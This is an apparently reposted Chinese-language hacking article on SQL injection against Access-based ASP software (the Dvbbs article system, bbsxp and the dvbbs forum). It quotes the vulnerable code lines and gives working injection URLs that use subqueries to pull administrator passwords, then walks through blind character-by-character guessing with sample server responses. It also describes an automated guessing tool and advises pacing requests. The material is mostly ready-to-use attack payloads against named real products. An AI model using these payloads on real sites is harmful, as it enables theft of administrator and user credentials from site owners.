上一篇：漂亮但不安全的CTB

利用SQL Injection With Access漏洞猜测用户和密码的东东

利用sql injection with access漏洞猜测用户和密码的东东

sql injection with access
很多朋友在access下进行sql注入攻击的时候，总会抱怨：access功能太弱了，没有注释符、不支持多语句查询...另一方面，很多程序员在使用access做数据库写程序时，往往只对那些对敏感表的操作代码执行严格审查，而其他一些表的操作代码就很粗糙了。这只能说我们对access了解太少了，前不久我有幸看到了一个专门的access站点，其论坛划分了很多版块，竟然全是和access有关的；原来这里头的学问还蛮多的，我等只是略懂皮毛而已。小弟愚笨，没能力写概览型的文章，还是通过几个例子来向大家说明些问题：

一：动网文章

涉及版本： ^^^^^^^^^^ 动网文章所有版本

描述： ^^^^^^ 动网文章是一款由www.aspsky.net开发和维护的源代码开放的文章管理系统，在国内使用非常广泛；由于其list.asp文件没有过滤用户提交传递给sql查询的输入，导致远程攻击者可以利用这个漏洞进行sql注入攻击。

具体： ^^^^^^ 试看list.asp中的相关代码： 15 sql="select aclass.class,anclass.nclass,article.title,article.classid,article.nclassid

from article,aclass,anclass where article.classid=aclass.classid and article.nclassid=anclass.

nclassid and article.articleid="&request("id")

id没有经任何检查就直接放到sql查询中，这点大家都很容易看出来，但说到利用，一些朋友就可是犯难了：这个语句对应的表是 article ，但管理密码在 admin 表里面，access又不能执行多语句查询，这个bug有什么用啊？呵呵，我们使用子查询不就得了，方法好多哦：

http://www.target.com/asp/darticle/list.asp?id=(select id from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=1 ;and exists (select id from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=1 ;and article.articleid in (select top 1 id from admin where len(password)>1 order by id) 等等...

怎么得到管理员密码就不用我废话了吧：）

二：bbsxp

涉及版本： ^^^^^^^^^^ bbsxp所有版本

描述： ^^^^^^ bbsxp是一款由www.bbsxp.com开发和维护的源代码开放的asp论坛；由于作者采用的安全防护措施过于简单，导致整个论坛多个文件存在sql injection漏洞，非法用户可以很快地智能破解任意用户口令或进行其他恶意攻击。

具体： ^^^^^^ 前不久我写了篇关于bbsxp漏洞的文章，作者简单的把论坛升了级，但仍然没有全面解决sql injection的问题，比如说： bank.asp ------------------------------------------------------------------------------- 152 sql="select * from user where username="&request("dxname")&"" 153 rs1.open sql,conn,1,3 154 if rs1.eof then 155 message=message&"

查无此人的账号！" 156 end if ------------------------------------------------------------------------------- 呵呵，拿user表中所有用户密码没问题了，但又有人开始嘀咕了：bbsxp后台管理密码和论坛前台密码不同，怎么办啊？后台密码存放在 clubconfig 表中，还是和上面利用方法一样，使用子查询嘛。还给个例子吧： searchok.asp ------------------------------------------------------------------------------- forumid=request("forumid") ... 21 if request("forumid")<>"" then 22 forumidor="forumid="&forumid&" and" end if ... sql="select * from forum

where deltopic<>1 and "&forumidor&" "&item&" "&timelimit&" order by lasttime desc " ... ------------------------------------------------------------------------------- 提交类似如下url（最好写个小代码发送这个请求）： http://www.target.com/bbsxp165/bbsxp/searchok.asp?search=author&searchxm=username&forumid=(select%20count (administrators)%20from%20clubconfig%20where%20len(adminpassword)>1) 瞧，我们这不是开始对 clubconfig 表进行查询了吗？

三：动网论坛(dvbbs)存在严重漏洞（补充）这个漏洞我公布后，就有好多朋友给我写信，有的问怎么破解md5（有破解的必要吗？）、有的要测试代码、还有的要我做个动画...同时也有人说后台管理密码和论坛前台密码不同，怎么拿后台的？我猜这些朋友自己没怎么思考，思考应该是种很美的享受吧？我补充下怎么拿后台md5加密的管理密码：

http://www.target.com/dv/tongji.asp?orders=2&n=2%20 ;(select%20max(id)%20from%20admin), 返回： ------------------------------------------------------------------------------- document.write(□);document.write(9);document.write( );document.write(□);document.write(9);document.write( ); -------------------------------------------------------------------------------

http://www.target.com/dv/tongji.asp?orders=2&n=2%20 ;(select%20max(id)%20from%20admin%20where%20left(password,1)=a), 返回： ------------------------------------------------------------------------------- document.write(□);document.write();document.write( );document.write(□);document.write();document.write( ); ------------------------------------------------------------------------------- 啊，为空，我们猜错了，再来：
=版权所有软件下载学院版权所有=

http://www.target.com/dv/tongji.asp?orders=2&n=2%20(select%20max (id)%20from%20admin%20where%20left(password,1)=d), 返回： ------------------------------------------------------------------------------- document.write(□);document.write(9);document.write( );document.write(□);document.write(9);document.write( ); ------------------------------------------------------------------------------- 哈哈，这下猜对了。接下来由你继续，当然，你可以把我以前写的那个小程序稍微修改后再放到这里使用！

不过我要提醒你，dvbbs后台管理文件是cookie+session双重认证哦！

后记：我到一个原代码下载站随机down了一些程序，包括论坛、留言本、文章下载管理...发现都存在类似的问题。其实只要我们谨慎点，问题就不会出现了！

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
当我们猜测到表名，和password列名时，提交这样的请求
http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where left(password,1)=c and id=1)
时候，如果返回文章成功则表示password字段的第一个字母为c

但是我们需要一个一个地猜，好麻烦！利用这个程序可以解决这个问题。
url,我们需要提交的url,like this
http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where left(password,1)=%c and id=1)
需要变化的字符用%c表示。
特征字符串即能区别返回成功于否的标志，一般设为文章的标题。
上面的猜测出来后(假设为r)，我们就可以把url设为
http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where left(password,2)=r%c and id=1)
继续，得到password的第二个字符

=版权所有软件下载学院版权所有=

如此，可以得到password

注意由于access数据库被访问过快时会短时间当掉，所以请控制好时间隔~

（）

下一篇：接踵而至的LB5K论坛漏洞

↓相关文章：